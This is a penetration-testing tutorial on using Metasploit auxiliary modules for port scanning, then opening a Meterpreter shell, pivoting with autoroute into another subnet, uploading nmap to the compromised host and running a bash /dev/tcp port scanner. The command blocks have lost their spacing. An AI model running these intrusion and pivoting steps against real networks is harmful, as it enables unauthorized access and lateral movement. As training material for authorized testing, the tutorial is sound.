Auxiliary modules in Metasploit are used for tasks like scanning, discovery, and fuzzing. They can perform both TCP and UDP port scans and gather information from services like FTP, SSH, and HTTP. These modules are useful during both the information-gathering and post-exploitation phases of a penetration test. Once initial access is obtained, auxiliary modules can be used to discover hosts and scan ports on different network subnets. Their primary function is to extract information rather than exploit vulnerabilities directly.
Demo: Attacking, Pivoting, Discovery
Imagine you’re tasked with infiltrating a target network. Your first step is to use auxiliary modules to identify open ports on your initial target. After uncovering a vulnerable service, you exploit it, securing a foothold within the system. With this access, you pivot into a different network subnet, gaining a pathway to other systems. From there, you use auxiliary modules again to scan for open ports on a second target. How would you approach this plan?
Goals
Discover open ports on your first target?
Exploit the service running on the target to gain an initial foothold?
Utilize that foothold to pivot and access other systems on a different network subnet?
Scan for open ports on the second target using auxiliary modules?
Execution
# 1. Search for port scanning auxiliary modulessearchportscan# 2. Select the desired port scanning module by number or name from the search resultsusenumber/name# 3. Display options to configure the moduleshowoptions# To review the required and optional parameters for the module# 4. Set the target IP address for port scanningsetRHOSTS [IP1] # Replace [IP1] with the target's IP address# 5. Execute the port scanrun# Starts the port scanning process
# ---- Meterpreter Session: Post-exploitation ----# 6. Open an interactive shell in the compromised machinemeterpreter>shell# 7. Start a bash shell on the remote target/bin/bash-i# Interact with the target's shell# 8. Check the network configuration to identify interfaces and potential routes for pivotingifconfig# View the network interfaces to see the available network subnets
# ---- Pivoting: Accessing another network ----# 9. Set up pivoting through the compromised machine to reach another network (IP2)meterpreter>runautoroute-s [IP2] # Add a route to the new subnet, allowing scanning of [IP2]# 10. Return the Meterpreter session to the background so other commands can be runbackground# Background the current session to continue scanning# 11. List active Meterpreter sessions to resume if neededsessions# Display the active sessions for further actions
# ---- Repeat for the second target (IP2) ----# 12. Search for a port scanning auxiliary module again for the second targetsearchportscan# 13. Use the selected module for port scanningusenumber/name# 14. Show the options to configure the new scanshowoptions# 15. Set the RHOSTS to the IP address of the second targetsetRHOSTS [IP2] # Replace [IP2] with the second target’s IP# 16. Run the port scan on the second targetrun# Start scanning the second target
autoroute: Sets up pivoting to access other subnets.
Network route refers to the path or set of rules that data packets follow to reach a destination across a network. In penetration testing, manipulating network routes (e.g., using the autoroute command in Meterpreter) allows pivoting, where access to one compromised system enables interaction with other network segments.
Meterpreter sessions are interactive command-line interfaces that allow an attacker to control a compromised system after an exploit succeeds. These sessions provide access to various tools for further exploitation, privilege escalation, and post-exploitation activities like running commands, uploading/downloading files, or pivoting.
Alternative Post Exploitation
Copying nmap to Victim 1
file/usr/bin/nmap#to check the nmap filesessions-i1#start the meterpreter sessionupload/usr/bin/nmap/tmp/nmap
Copying a scanner to Victim 1
# bash based port scanner#!/bin/bashfor port in {1..1000}; dotimeout1bash-c"echo >/dev/tcp/$1/$port"2>/dev/null&&echo"port $port is open"done